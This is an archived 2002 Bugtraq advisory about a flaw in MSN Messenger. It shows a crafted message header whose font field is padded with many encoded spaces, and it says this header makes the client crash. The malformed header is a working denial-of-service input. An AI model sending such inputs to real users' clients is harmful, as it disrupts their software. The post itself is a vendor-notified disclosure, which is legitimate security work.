[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Misformated message header causes msn messenger to crash
From:       <underdoc () pandora ! be>
Date:       2002-05-06 15:04:13
[Download RAW message or body]



Introduction to the flaw.
Msn Messenger is a popular Instant-Messaging client from 
Microsoft. After the previous flaws regarding the privacy 
of users another flaw is discovered. This flaw makes the 
msn messenger client crash after receiving a misformated 
font variable in the message header with instant messages. 

How does it work exactly?
The Msn Messenger client works by sending a header with 
every message. So every time a user wants to send a 
message, it generates a header, containing information 
about the font, the color of the message and some other 
information. 

The flaw
A normal header look something like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

When we replace the font field with something very large. 
Creating an overflaw the header will look like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

As a result the Msn Messenger client will crash

this flaw only crashes the Msn Messenger from Microsoft. 
Trillian is not affected.

This flaw is a severe danger. As it's not so hard for 
hackers to use this flaw in their application. 
Microsoft has been informed on this issue. 

[prev in list] [next in list] [prev in thread] [next in thread]